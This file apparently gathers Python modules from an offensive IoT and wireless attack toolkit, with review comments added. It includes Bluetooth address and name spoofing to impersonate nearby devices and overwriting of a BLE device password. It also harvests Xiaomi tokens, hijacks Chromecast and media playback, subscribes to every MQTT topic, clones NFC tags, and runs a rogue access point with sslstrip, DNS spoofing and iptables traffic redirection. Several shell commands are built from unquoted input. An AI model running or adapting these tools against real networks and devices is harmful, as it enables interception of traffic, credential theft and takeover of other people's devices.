def run(self):
    """Set the local adapter's Bluetooth address to ``self.args['bmac']`` and
    start the service with the matching device name and class.

    The name and class are taken from a nearby device whose address equals
    ``bmac`` when discovery finds one, otherwise from ``self.args['name']``
    and ``self.args['class']``; when neither source provides a value the
    module stops with an error. The address change itself is delegated to
    the bundled ``apps/spooftooph`` binary via ``system()``.
    """
    print_info("Searching bluetooth devices to check MAC...")
    devices = discover_devices(lookup_names=True, lookup_class=True)
    device_name = None
    device_class = None
    for mac, name, cl in devices:
        if self.args["bmac"] == mac:
            print_info("A nearby device has been found")
            device_name = name
            device_class = hex(cl)  # class of device as a "0x..." string
            break
    if not device_name:
        print_info("No nearby device found")
        if self.args['name']:
            device_name = self.args['name']
        else:
            print_error("We can't find the name")
            return
    if not device_class:
        if self.args['class']:
            device_class = self.args['class']
        else:
            print_error("We can't find the profile")
            return
    print_info("Trying to change name and MAC")
    # NOTE(review): iface and bmac are placed on a shell command line
    # unquoted; system() hands the string to the shell, so these option
    # values are trusted to be plain adapter/address tokens.
    result = system(
        f"apps/spooftooph -i {self.args['iface']} -a {self.args['bmac']}")
    # system() returns the wait status; zero means the binary succeeded
    if int(result) == 0:
        print_ok("Done!")
        print_info("Starting Bluetooth service to allow connections")
        self._start_service(device_name, device_class)
    else:
        print_error("Execution fault...")
def _load_theme(self, theme):
    """Activate the terminal colour theme named by ``theme[0]``.

    Looks the name up in ``colors_terminal``; an unknown name is reported
    and leaves the current theme untouched.
    """
    palette = colors_terminal.get(theme[0])
    if palette is None:
        print_error("Theme not available")
        return
    ColorSelected(palette)
    print_ok("Theme changed!")
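def run(self):
    """Open the video source in ``self.args['uri']`` and show it until 'q' is pressed.

    A purely numeric URI is used as a local camera index; anything else is
    handed to OpenCV as-is (file path or stream URL). The capture handle is
    released and the preview window destroyed on every exit path.
    """
    # https://stackoverflow.com/questions/49978705/access-ip-camera-in-python-opencv/51166331
    uri = self.args["uri"]
    try:
        uri = int(uri)
    except (TypeError, ValueError):
        pass  # not a camera index: keep the value as given
    print_info("Trying to connect...")
    cam = cv2.VideoCapture(uri)
    # A VideoCapture object is truthy even when the source failed to open,
    # so the previous `if cam:` could never reach its error branch.
    if not cam.isOpened():
        print_error("No connection")
        return
    announced = False
    try:
        while True:
            try:
                success, frame = cam.read()
                if not success:
                    print_error("No connection")
                    break
                if not announced:
                    # Say it once, not on every frame.
                    print_ok("Connected")
                    print_info("Use q in the frame to close it")
                    announced = True
                cv2.imshow('frame', frame)  # Show frame
                if cv2.waitKey(1) & 0xFF == ord('q'):  # To close
                    break
            except KeyboardInterrupt:
                break
            except cv2.error as e:
                # Previously a bare `except: pass` retried here forever.
                print_error(f"Error reading frame: {e}")
                break
    finally:
        cam.release()
        cv2.destroyAllWindows()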
def get_iface(self, interfaces):
    """Pick the wireless interface to use for monitor mode.

    With no interfaces the module is flagged to exit and None is returned;
    with exactly one it is returned directly. Otherwise every interface runs
    an ``iwlist scan`` and the one that saw the most access points wins,
    falling back to the first interface if the comparison fails.
    """
    if len(interfaces) < 1:
        print_error(
            'No wireless interfaces found, bring one up and try again')
        self.exit = True
        return None
    if len(interfaces) == 1:
        return next(iter(interfaces))
    # Find most powerful interface: count the APs each one can see
    scan_results = []
    for candidate in interfaces:
        scanner = Popen(['iwlist', candidate, 'scan'], stdout=PIPE, stderr=self.DN)
        report = scanner.communicate()[0].decode()
        # ' - Address:' opens each AP entry in iwlist output
        seen = sum(1 for line in report.split('\n') if ' - Address:' in line)
        scan_results.append((seen, candidate))
        print_ok(f'Networks discovered by {candidate}: {seen}')
    try:
        return max(scan_results)[1]
    except Exception as e:
        print_error(f'Minor error: {e}')
        fallback = interfaces[0]
        print_info(f' Starting monitor mode on {fallback}')
        return fallback
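def get_mon_mac(self, mon_iface):
    ''' Return the hardware (MAC) address of ``mon_iface`` as ``aa:bb:cc:dd:ee:ff``.

    Queries the kernel with the SIOCGIFHWADDR ioctl (0x8927) through a
    throwaway UDP socket that is closed before returning.
    http://stackoverflow.com/questions/159137/getting-mac-address
    '''
    # The ioctl fills a struct ifreq: the interface name occupies the first
    # 16 bytes and the address sits at bytes 18..24 of the sockaddr that
    # follows. Python returns a bytes object as long as the argument passed
    # in, so the name must be padded (the original recipe used
    # struct.pack('256s', ...)); a bare 15-byte name yields an empty slice.
    ifreq = mon_iface[:15].encode().ljust(256, b'\0')
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        info = fcntl.ioctl(s.fileno(), 0x8927, ifreq)
    # Iterating bytes yields ints already; ord(int) raises on Python 3.
    mac = ':'.join(f'{octet:02x}' for octet in info[18:24])
    print_ok(f'Monitor mode: {mon_iface} - {mac}')
    return mac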
def run(self):
    """Start dirtytooth for ``self.args['bmac']`` with ``self.args['path']``.

    ``start_dirtytooth`` answers 1 when the service was launched and 0 when
    the dirtyagent process is missing; any other value prints nothing.
    """
    print_info("Launching Service")
    outcome = start_dirtytooth(self.args["bmac"], self.args["path"])
    reports = {
        1: (print_ok, "Done"),
        0: (print_error,
            'Process dirtyagent doesn´t exist (use module launch-service first)'),
    }
    report = reports.get(outcome)
    if report is not None:
        emit, text = report
        emit(text)
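def run(self):
    """Reset the HCI adapter named in ``self.args['iface']`` with ``hciconfig``.

    Anything on stderr, or a non-zero exit status, is reported as an error;
    otherwise the reset is confirmed.
    """
    # Pass the interface name as one argv element instead of splitting an
    # f-string on spaces, so an unexpected value cannot become extra arguments.
    proc = Popen(["hciconfig", self.args['iface'], "reset"], stdout=PIPE, stderr=PIPE)
    _out, err = proc.communicate()
    if err or proc.returncode != 0:
        # hciconfig may exit non-zero with an empty stderr; report the
        # status rather than an empty message in that case.
        message = err.decode().strip() or f"hciconfig exited with status {proc.returncode}"
        print_error(message)
    else:
        print_ok(f"{self.args['iface']} has been reset")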
def _start_capture(self):
    """Sniff HCI traffic on adapter 0 and write it to ``self.args['file']`` as pcap."""
    captured = BluetoothHCISocket(0).sniff()
    count = len(captured)
    if count == 0:
        print_info("No packets captured")
        return
    target = self.args["file"]
    print_info(f"Writing {count} packets in {target}")
    wrpcap(target, captured)
    print_ok("Done!")
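def start_mon_mode(self, interface):
    """Put ``interface`` into monitor mode (down, ``mode monitor``, up).

    Returns the interface name on success. When one of the three commands
    fails, prints an error, sets ``self.exit`` and returns None.
    ``os.system()`` never raises for a failing command, so each exit status
    is checked explicitly instead of relying on the ``except`` branch.
    """
    print_ok(f'Starting monitor mode: {interface}')
    steps = (
        'ifconfig %s down' % interface,
        'iwconfig %s mode monitor' % interface,
        'ifconfig %s up' % interface,
    )
    try:
        for command in steps:
            # os.system returns the wait status; non-zero means the step failed
            if os.system(command) != 0:
                print_error('Could not start monitor mode')
                self.exit = True
                return None
    except Exception:
        print_error('Could not start monitor mode')
        self.exit = True
        return None
    return interface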
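def run(self):
    """Send a ``setUri`` media-control request for ``self.args['uri']`` to the
    device at ``self.args['rhost']`` and report whether it answered 200."""
    # NOTE(review): uri is interpolated into the query string without URL
    # encoding, so a value containing '&', '#' or spaces would be split by
    # the device; left as-is because the target's decoding rules are unknown.
    url = f"http://{self.args['rhost']}/remote/media_control?action=setUri&uri={self.args['uri']}"
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }
    try:
        # Without a timeout an unresponsive host blocks the module forever.
        response = requests.get(url, headers=headers, timeout=10)
    except requests.RequestException as e:
        print_error(f"Request failed: {e}")
        return
    if response.status_code == 200:
        print_ok("Done!")
    else:
        print_error(f"Response code: {response.status_code}")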
def run(self):
    """Look up SDP services for ``self.args['bmac']``, or for every reachable
    device when that option is the string "None", and print what was found."""
    print_info("Searching services...")
    target = self.args["bmac"]
    # User input is String (just in case): "None" means no address filter
    if str(target) == "None":
        print_info("This process can take time, patience")
        target = None
    found = find_service(address=target)
    if not found:
        print_info("No services found")
        return
    print_ok(f"Found {len(found)} services")
    print("")
    self._show_services(found)
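def start(self, to_search):
    """Run a Shodan query for ``to_search`` and store the results in ``self.args['file']``.

    A failure to open the output file aborts the module with an error. The
    file is closed on every path — previously it stayed open when the search
    returned nothing or raised.
    """
    try:
        file_to_save = open(self.args["file"], "w+")
    except Exception as e:
        print_error(e)
        print_error("Module has not been launched")
        return
    with file_to_save:
        data_collected = shodan_search(file_to_save, self.args["apishodan"], to_search)
        if data_collected:
            print_ok(f"Saving information in {self.args['file']}")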
def load_module(path):
    """Custom function to load a new module

    The slash-separated ``path`` is turned into a dotted name under the
    ``modules`` package and imported; the module's ``HomeModule`` class is
    instantiated and returned.

    Args:
        path (str): Path of the module

    Returns:
        HomeModule: Module loaded
    """
    print_info('Loading module...')
    dotted_name = "modules." + path.replace("/", ".")
    loaded = importlib.import_module(dotted_name)
    print_ok('Module loaded!')
    return loaded.HomeModule()
def get_mon_iface(self, iface):
    """Return an interface in monitor mode.

    Uses ``iface`` when it is already a monitor interface, else the first
    monitor interface ``self.iwconfig()`` reports (setting ``self.monitor_on``
    in both cases); otherwise selects the strongest interface and switches
    it to monitor mode.
    """
    if iface and self.check_monitor(iface):
        self.monitor_on = True
        return iface
    monitors, interfaces = self.iwconfig()
    if monitors:
        self.monitor_on = True
        return monitors[0]
    # No monitor interface yet: pick one and enable monitor mode on it
    print_ok('Finding the most powerful interface...')
    chosen = self.get_iface(interfaces)
    return self.start_mon_mode(chosen)
def run(self):
    """Dump a tag to ``self.args['file']`` with ``Dump``, wait for the operator
    to swap tags, then write the same file back with ``Load``."""
    dumper = Dump()
    loader = Load()
    # Both sub-modules take the same reader and file options
    options = (["reader", self.args["reader"]], ["file", self.args["file"]])
    input("Press any key to dump data from a NFC file")
    print_info("Setting dump options")
    for option in options:
        dumper.set_value(option)
    dumper.run()
    input("Change NFC file and press any key to load the content")
    print_info("Setting load options")
    for option in options:
        loader.set_value(option)
    loader.run()
    print_ok("Done!")
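def write_data(self, data, uuid):
    """Write ``data`` to every characteristic whose UUID equals ``uuid``.

    A characteristic is written only when ``self._is_writable`` accepts its
    property string. Failures are reported instead of being swallowed by the
    previous bare ``except: pass`` (which also hid Ctrl-C).
    """
    try:
        characteristics = self.get_characteristics()
        for ch in characteristics:
            if ch.uuid != uuid:
                continue
            if not self._is_writable(ch.propertiesToString()):
                print_error("It is not writable")
                continue
            print_ok("Good! It's writable!")
            try:
                ch.write(data)
                print_ok("Done!")
            except Exception as e:
                print_error(f"It has not been written: {e}")
    except Exception as e:
        # Listing characteristics or inspecting one failed
        print_error(f"Could not write characteristic: {e}")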
def _subscribe(self):
    """Connect to ``self.args['bmac']``, subscribe to ``uuid-subscribe``, write
    the encoded ``data`` to ``uuid-write`` and wait for notifications.

    Returns True when the operator interrupts while subscribed; otherwise
    falls through and returns None after reporting the outcome.
    """
    #print_info(f"Trying to subscribe to {self.args['bmac']}")
    device = self.args["bmac"]
    data = self._transform_data(self.args["encode"], self.args["data"])
    type = self.args["type"]  # address type handed to BLE(); shadows the builtin
    uuid_subscribe = self.args["uuid-subscribe"]
    uuid_write = self.args["uuid-write"]
    subs = False
    try:
        iface = int(self.args["iface"])
    except:
        iface = 0  # adapter 0 when the option is unset or not numeric
    print_info(f"\nTrying to subscribe to {device}")
    ble_device = BLE(device, type, iface)
    # Up to six connection attempts, three seconds apart
    for x in range(0, 6):
        try:
            ble_device.connect()
            print_ok("\nDevice connected...")
            ble_device.set_delegate(HomeSecurityDelegate)
            ble_device.set_subscribe(uuid_subscribe)
            subs = True
            break
        except KeyboardInterrupt:
            print("Module Interrupted")
            break
        except:
            sleep(3)
    # NOTE(review): reached even when no attempt connected; presumably
    # write_data fails quietly in that case — confirm.
    ble_device.write_data(data, uuid_write)
    if subs:
        while True:
            try:
                # 8-second poll; a delivered notification ends the wait
                if (ble_device.device.waitForNotifications(8.0)):
                    break
                sleep(3)
            except KeyboardInterrupt:
                print("Module Interrupted")
                return True
            except:
                # NOTE(review): after disconnect() the loop keeps polling the
                # same object with no delay — confirm this is intended.
                ble_device.disconnect()
    print("")
    if subs:
        print_error(f"Unsubscribed {device}")
    else:
        print_error(f"Unable to subscribe to {device}")
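def shodan_search(file_to_save, apikey, to_search):
    """Query Shodan for ``to_search`` and write one ``host:port - location``
    line per match to ``file_to_save``.

    Args:
        file_to_save: open, writable text file.
        apikey (str): Shodan API key passed to ``get_shodan_search_matches``.
        to_search (str): Shodan query string.

    Returns:
        bool: True when matches were written, False when there were none.

    A match without ``location`` data is written with ``None`` in place of
    the missing fields rather than aborting the whole run with a KeyError.
    """
    matches = get_shodan_search_matches(apikey, to_search)
    if not matches:
        print_info("No data recollected")
        return False
    print_ok("Data collected!")
    for entry in matches:
        location = entry.get('location') or {}
        city = location.get('city')
        country = location.get('country_name')
        if city:
            country = city + f"({country})"
        # distinct name: the old code rebound `data` while iterating over it
        endpoint = f"{entry['ip_str']}:{entry['port']}"
        file_to_save.write(f"{endpoint.ljust(20)} - {country}\n")
    return True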
def show_tag(self, tag, verbose):
    """Print a summary of ``tag``: its NDEF capabilities and records when it
    has any, plus a raw memory dump when ``verbose`` is set."""
    print(tag)
    ndef = tag.ndef
    if ndef:
        print_info("NDEF Capabilities:")
        print_body(f" readable = {self.get_color(ndef.is_readable)}")
        print_body(f" writeable = {self.get_color(ndef.is_writeable)}")
        print(f" capacity = {ndef.capacity} byte")
        print(f" message = {ndef.length} byte")
        if ndef.length > 0:
            print_info("NDEF Message:")
            for number, record in enumerate(ndef.records, start=1):
                print_ok(f"record {number}")
                fields = (("type", record.type), ("name", record.name), ("data", record.data))
                for label, value in fields:
                    print(f" {label} =", repr(value))
    if verbose:
        print_info("Memory Dump:")
        print(' ' + '\n '.join(tag.dump()))
def run(self):
    """Write ``self.args['password']`` (hex text) to one characteristic of the
    BLE device at ``self.args['bmac']``.

    Connects with address type "random" on adapter ``iface`` (0 when the
    option is unset or not numeric), checks the characteristic advertises
    WRITE, then writes the decoded bytes. Connection and write failures are
    reported; an interrupt during connection aborts the run.
    """
    # NOTE(review): this literal is 35 characters long, while a 128-bit UUID
    # is 36 (8-4-4-4-12) — the last group looks one hex digit short. Confirm
    # against the device documentation before relying on it.
    uuid = "36d25039-5cbc-5ee5-b688-b90fda300d6"
    bmac = self.args["bmac"]
    try:
        iface = int(self.args["iface"])
    except:
        iface = 0
    print_info(f"Trying to connect {bmac}")
    try:
        p = Peripheral(bmac, "random", iface)
        print_ok("connected")
    except KeyboardInterrupt:
        print_info("Interrupted... exit run")
        return
    except:
        print_error("Failed to connect")
        return
    try:
        # first (and presumably only) characteristic with that UUID
        ch = p.getCharacteristics(uuid=uuid)[0]
        if "WRITE" in ch.propertiesToString():
            print_ok("Good! It's writable!")
        else:
            print_error("It is not writable")
            return
        # accept an optional "0x" prefix on the hex password
        hex_password = bytes.fromhex(self.args['password'].replace(
            "0x", ""))
        print_info(f"Updating Password in {bmac}")
        ch.write(hex_password)
        print_ok("Done!")
    except:
        print_error("It was not possible to write")
def _subscribe(self):
    """Connect to ``self.args['bmac']``, write the encoded ``data`` to
    ``self.args['uuid']`` and subscribe for notifications, reconnecting after
    each subscription ends until the operator interrupts.

    Up to five failed connection attempts (three seconds apart) give up with
    "Unable to subscribe"; an interrupt after a successful subscription
    reports "Unsubscribed".
    """
    #print_info(f"Trying to subscribe to {self.args['bmac']}")
    bmac = self.args["bmac"]
    data = self._transform_data(self.args["encode"], self.args["data"])
    subs = False
    conn = 0  # failed connection attempts so far
    try:
        iface = int(self.args["iface"])
    except:
        iface = 0  # adapter 0 when the option is unset or not numeric
    print_info(f"\nTrying to subscribe to {bmac}")
    ble_device = BLE(self.args["bmac"], self.args["type"], iface)
    while True:
        wait = False
        try:
            ble_device.connect()
            print_ok("\nDevice connected...")
            ble_device.write_data(data, self.args["uuid"])
            subs = True
            wait = True
            ble_device.set_delegate(HomeSecurityDelegate)
        except KeyboardInterrupt:
            print("Module Interrupted")
            break
        except:
            sleep(3)
            conn += 1
            if conn == 5:
                break
            continue
        if wait:
            # NOTE(review): assumed to block until the subscription ends;
            # the loop then reconnects — confirm against BLE.subscribe.
            ble_device.subscribe()
    print("")
    if subs:
        print_error(f"Unsubscribed {self.args['bmac']}")
    else:
        print_error(f"Unable to subscribe to {self.args['bmac']}")
def run(self):
    """Discover miio (Xiaomi) devices with the protocol's hello packet on UDP 54321.

    Sends the packet to ``self.args['rhost']`` — or to the broadcast address
    when that option is the string "None" — and prints each responding
    address once, together with the token bytes from its reply, until
    ``timeout`` seconds (default 5) pass without an answer.
    """
    # thanks to python-miio https://github.com/rytilahti/python-miio
    try:
        timeout = int(self.args["timeout"])
    except:
        timeout = 5
    addrs = []  # To avoid duplicates
    if str(self.args["rhost"]) != "None":
        addr = self.args["rhost"]
    else:
        addr = '255.255.255.255'
    print("Sending packets...")
    # 32-byte hello: the 0x2131 magic and 0x0020 length, remaining fields 0xff
    helobytes = bytes.fromhex('21310020ffffffffffffffffffffffffffffffffffffffffffffffffffffffff')
    # NOTE(review): the socket is never closed explicitly; it is released at exit.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.settimeout(timeout)
    s.sendto(helobytes, (addr, 54321))
    while True:
        try:
            data, addr = s.recvfrom(1024)
            token = ""
            try:
                #TODO
                # Bytes 16.. of the reply are shown through the bytes repr
                # with the b'', quotes and \x prefixes stripped.
                # NOTE(review): bytes that are printable ASCII are not
                # rendered as hex by this repr trick — confirm the expected
                # output format against python-miio.
                token = str(data[16:]).replace("b'","").replace("'","").replace("\\x","")
            except:
                token = ""
            if addr[0] not in addrs:
                print_info(f"Xiaomi Device >> {addr[0]} - Token({token})")
                addrs.append(addr[0])
        except socket.timeout:
            # No reply within `timeout`: discovery is over
            print_ok("Discovery done")
            break
        except Exception as ex:
            print_error(f"Error while reading discover results: {ex}")
            break
def output(self, err, monchannel):
    """Clear the screen and redraw the live view: the monitor channel line (or
    ``err`` when given), then the client table and the access-point table,
    each read under ``self.lock`` and only while its show_* flag is on."""
    os.system('clear')
    if err:
        print_error(err)
    else:
        print_ok(f'{self.mon_iface} channel: {monchannel}\n')
    if self.clients_APs and self.show_stations:
        print(' ch Client BSSID (ESSID)')
        # Print the clients list
        with self.lock:
            for ca in self.clients_APs:
                channel = ca['channel'].ljust(2)
                print_info(
                    f"[*] {channel} - {ca['client']} ({ca['vendor']}) - {ca['bssid_ap']} ({ca['essid_ap']})"
                )
    if self.APs and self.show_aps:
        print('\n Access Points Enc ch ESSID')
        with self.lock:
            for ap in self.APs:
                channel = ap["ap_channel"].ljust(2)
                print(f'[*] {ap["bssid"]} - {ap["encrypted"]} - {channel} - {ap["ssid"]}')
    print('')
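def run(self):
    """Find a Chromecast by friendly name (``self.args['name']``) or host
    (``self.args['rhost']``) and play ``self.args['video']`` through its
    YouTube controller.

    At least one of name/rhost must be set; ``timeout`` defaults to 6 when
    the option is the string "None".
    """
    if not self.args["rhost"] and not self.args["name"]:
        print_info(
            "Show options, it's necessary to configure onename or rhost")
        return
    if str(self.args["timeout"]) == "None":
        self.args["timeout"] = 6
    try:
        # NOTE(review): the return shape of get_chromecasts differs between
        # pychromecast versions — confirm against the pinned version.
        chromecasts = pychromecast.get_chromecasts(
            timeout=self.args["timeout"])
        cast = next(cc for cc in chromecasts
                    if (cc.device.friendly_name == self.args["name"]
                        or cc.host == self.args["rhost"]))
        cast.wait()
        print_info("Device found, sending video")
    except Exception:
        # StopIteration (no match) and library errors land here; Ctrl-C now
        # propagates instead of being reported as a missing device.
        print_error("Device no found")
        return
    yt = YouTubeController()
    cast.register_handler(yt)
    yt.play_video(self.args["video"])
    print_ok("Done!")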
def __on_connect(self, client, userdata, flags, rc):
    """MQTT on_connect callback: only announces that the broker accepted the
    connection. The callback arguments are unused."""
    del client, userdata, flags, rc  # fixed callback signature, nothing to do with them
    print_ok("Connection successful!")
def __on_connect(self, client, userdata, flags, rc):
    """MQTT on_connect callback.

    On the first connection, and only when ``self.args['verbose']`` is the
    string "true" (case-insensitive), announces the connection, subscribes
    to every topic (``#`` at QoS 1 and ``$SYS/#``) and records
    ``self.connected``. Later connections are ignored.
    """
    verbose = str(self.args["verbose"]).lower() == "true"
    if self.connected or not verbose:
        return
    print_ok("Connection successful!", start="\n", end="\n")
    client.subscribe("#", qos=1)
    client.subscribe("$SYS/#")
    self.connected = True
def test_custom_print_ok(capfdbinary):
    """print_ok must write the message prefixed with "[+] " to stdout."""
    text = "Done!"
    custom_print.print_ok(text)
    captured = capfdbinary.readouterr().out.decode()
    assert f"[+] {text}" in captured
def connect(self):
    """Open a connection to ``self.bmac`` (address type ``self.type``, adapter
    ``self.iface``) and keep the resulting Peripheral in ``self.device``."""
    peripheral = Peripheral(self.bmac, self.type, self.iface)
    self.device = peripheral
    print_ok("connected")
def stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path):
    """Tear down what ``launch_ap`` started and restore the host configuration.

    Sends Ctrl-C to the enabled screen sessions (hostapd, sslstrip, dns2proxy,
    wireshark, driftnet, tshark), restores the dns2proxy, NetworkManager and
    dnsmasq configuration from their ``.backup`` copies, restarts
    NetworkManager, stops dnsmasq and flushes iptables. Every step runs via
    ``os.system`` with sudo and no exit status is checked.

    ``ap_iface``, ``net_iface``, ``channel``, ``hostapd_wpa`` and ``ssid`` are
    accepted for symmetry with ``launch_ap`` and unused here. A Ctrl-C during
    the teardown repeats the whole sequence with each screen step wrapped so
    the remaining steps still run.
    """
    try:
        print_info("Stopping AP")
        if sslstrip_if:
            os.system("sudo screen -S mitmap-hostapd -X stuff '^C\n'")
            os.system("sudo screen -S mitmap-sslstrip -X stuff '^C\n'")
            os.system("sudo screen -S mitmap-dns2proxy -X stuff '^C\n'")
            if dns_if:
                print_info("Restoring old " + script_path + "src/dns2proxy/spoof.cfg...")
                os.system("sudo mv " + script_path + "src/dns2proxy/spoof.cfg.backup " + script_path + "src/dns2proxy/spoof.cfg")
        if wireshark_if:
            os.system("sudo screen -S mitmap-wireshark -X stuff '^C\n'")
        if driftnet_if:
            os.system("sudo screen -S mitmap-driftnet -X stuff '^C\n'")
        if tshark_if:
            os.system("sudo screen -S mitmap-tshark -X stuff '^C\n'")
        print_info("Restoring old NetworkManager.cfg")
        if os.path.isfile("/etc/NetworkManager/NetworkManager.conf.backup"):
            os.system(
                "sudo mv /etc/NetworkManager/NetworkManager.conf.backup /etc/NetworkManager/NetworkManager.conf"
            )
        else:
            # no backup means launch_ap created the file; drop it
            os.system("sudo rm /etc/NetworkManager/NetworkManager.conf")
        print_info("Restarting NetworkManager...")
        os.system("sudo service network-manager restart")
        print_info("Stopping DNSMASQ server...")
        os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1")
        os.system("sudo pkill dnsmasq")
        print_info("Restoring old dnsmasq.cfg...")
        os.system(
            "sudo mv /etc/dnsmasq.conf.backup /etc/dnsmasq.conf > /dev/null 2>&1"
        )
        print_info("Deleting old '/etc/dnsmasq.hosts' file...")
        os.system("sudo rm /etc/dnsmasq.hosts > /dev/null 2>&1")
        print_info("Flushing iptables rules...")
        os.system("sudo iptables --flush")
        os.system("sudo iptables --flush -t nat")
        os.system("sudo iptables --delete-chain")
        os.system("sudo iptables --table nat --delete-chain")
        #print_info("Traffic have been saved to the 'log' folder!")
        print_ok("mitmAP stopped.")
    except KeyboardInterrupt:
        # Second pass: same teardown, but a failing screen step no longer
        # stops the rest of the cleanup.
        print_info("\n\n[!] Stopping... \n(Dont worry if you get errors)")
        try:
            if sslstrip_if:
                os.system("sudo screen -S mitmap-hostapd -X stuff '^C\n'")
                os.system("sudo screen -S mitmap-sslstrip -X stuff '^C\n'")
                os.system("sudo screen -S mitmap-dns2proxy -X stuff '^C\n'")
                if dns_if:
                    print_info("Restoring old " + script_path + "src/dns2proxy/spoof.cfg...")
                    os.system("sudo mv " + script_path + "src/dns2proxy/spoof.cfg.backup " + script_path + "src/dns2proxy/spoof.cfg")
        except:
            pass
        try:
            if wireshark_if:
                os.system("sudo screen -S mitmap-wireshark -X stuff '^C\n'")
        except:
            pass
        try:
            if driftnet_if:
                os.system("sudo screen -S mitmap-driftnet -X stuff '^C\n'")
        except:
            pass
        try:
            if tshark_if:
                os.system("sudo screen -S mitmap-tshark -X stuff '^C\n'")
        except:
            pass
        print_info("Restoring old NetworkManager.cfg")
        if os.path.isfile("/etc/NetworkManager/NetworkManager.conf.backup"):
            os.system(
                "sudo mv /etc/NetworkManager/NetworkManager.conf.backup /etc/NetworkManager/NetworkManager.conf > /dev/null 2>&1"
            )
        else:
            os.system(
                "sudo rm /etc/NetworkManager/NetworkManager.conf > /dev/null 2>&1"
            )
        print_info("Restarting NetworkManager...")
        os.system("sudo service network-manager restart")
        print_info("Stopping DNSMASQ server...")
        os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1")
        os.system("sudo pkill dnsmasq")
        print_info("Restoring old dnsmasq.cfg...")
        os.system(
            "sudo mv /etc/dnsmasq.conf.backup /etc/dnsmasq.conf > /dev/null 2>&1"
        )
        print_info("Deleting old '/etc/dnsmasq.hosts' file...")
        os.system("sudo rm /etc/dnsmasq.hosts > /dev/null 2>&1")
        print_info("Flushing iptables rules...")
        os.system("sudo iptables --flush")
        os.system("sudo iptables --flush -t nat")
        os.system("sudo iptables --delete-chain")
        os.system("sudo iptables --table nat --delete-chain")
        print("Module stopped.")
def launch_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, wpa_passphrase, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, all_dns, proxy_if):
    """Bring up a hostapd access point on ``ap_iface`` and run it until
    interrupted, then tear everything down through ``stop_ap``.

    The ``*_if`` flags and ``hostapd_wpa`` arrive as strings and are turned
    into booleans ("true", case-insensitive) first. Configuration helpers
    (``network_manager_config``, ``dnsmasq_config``, ``hotspad_config``,
    ``ip_tables_config``) prepare the host; ``script_path`` returned by the
    first one is used for all log and tool paths. ``sslstrip_if`` selects the
    sslstrip/dns2proxy mode; otherwise ``proxy_if`` ("no", "nossl" or any
    other value) decides between plain hostapd and mitmproxy. ``all_dns``
    holds the ``ssl`` / ``no_ssl`` spoofing lines when ``dns_if`` is set.

    Every command is issued through ``os.system`` with sudo; exit statuses
    are not checked. KeyboardInterrupt ends the run silently, any other
    exception is printed, and ``finally`` always calls ``stop_ap``.
    """
    sslstrip_if = str(sslstrip_if).lower() == "true"
    driftnet_if = str(driftnet_if).lower() == "true"
    wireshark_if = str(wireshark_if).lower() == "true"
    tshark_if = str(tshark_if).lower() == "true"
    dns_if = str(dns_if).lower() == "true"
    hostapd_wpa = str(hostapd_wpa).lower() == "true"
    try:
        # Network manager config
        # NOTE(review): if this raises, script_path is unbound and the
        # stop_ap call in `finally` fails with NameError — confirm intended.
        script_path = network_manager_config(ap_iface)
        #DNSMASQ CONFIG
        dnsmasq_config(ap_iface, sslstrip_if)
        #HOSTAPD CONFIG
        hotspad_config(ap_iface, ssid, channel, wpa_passphrase, hostapd_wpa)
        #IPTABLES
        ip_tables_config(ap_iface, net_iface)
        #SSLSTRIP MODE
        if sslstrip_if:
            #SSLSTRIP DNS SPOOFING
            if dns_if:
                print_info("Backing up " + script_path + "src/dns2proxy/spoof.cfg...")
                os.system("sudo cp " + script_path + "src/dns2proxy/spoof.cfg " + script_path + "src/dns2proxy/spoof.cfg.backup")
                os.system("sudo cat /dev/null > " + script_path + "src/dns2proxy/spoof.cfg")
                i = 0  # unused
                for ssl_dns_line in all_dns["ssl"]:
                    # each line is embedded in single quotes on a shell command line
                    os.system("sudo echo -e '" + ssl_dns_line + "' >> " + script_path + "src/dns2proxy/spoof.cfg")
            #/SSLSTRIP DNS SPOOFING
            start_dns_masq()
            os.system(
                "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000"
            )
            os.system(
                "sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 53"
            )
            os.system(
                "sudo iptables -t nat -A PREROUTING -p tcp --dport 53 -j REDIRECT --to-port 53"
            )
            os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
            print_info("Starting AP on " + ap_iface + " in screen terminal...")
            os.system("sudo screen -S mitmap-sslstrip -m -d python " + script_path + "src/sslstrip2/sslstrip.py -l 9000 -w " + script_path + "logs/mitmap-sslstrip.log -a")
            os.system("sudo screen -S mitmap-dns2proxy -m -d sh -c 'cd " + script_path + "src/dns2proxy && python dns2proxy.py'")
            time.sleep(5)
            os.system(
                "sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf"
            )
            start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if)
            # print_info("configuring ñapa...")
            # sniff = Sniffing()
            # sniff.start_mon_mode(ap_iface)
            # sleep(1)
            #print("\nTAIL started on " + script_path + "logs/mitmap-sslstrip.log...\nWait for output... (press 'CTRL + C' 2 times to stop)\nHOST-s, POST requests and COOKIES will be shown.\n")
            try:
                time.sleep(5)
            except:
                print("")
            #print_info("Restarting tail in 1 sec... (press 'CTRL + C' again to stop)")
            print_ok("Done")
            # Idle until Ctrl-C; the re-raise reaches the outer handler below
            while True:
                try:
                    time.sleep(1)
                    #os.system("sudo tail -f " + script_path + "logs/mitmap-sslstrip.log | grep -e 'Sending Request: POST' -e 'New host:' -e 'Sending header: cookie' -e 'POST Data'")
                except KeyboardInterrupt:
                    raise KeyboardInterrupt
            #STARTING POINT
        #/SSLSTRIP MODE
        else:
            #DNSMASQ DNS SPOOFING
            if dns_if:
                print_info("Backing up /etc/dnsmasq.conf...")
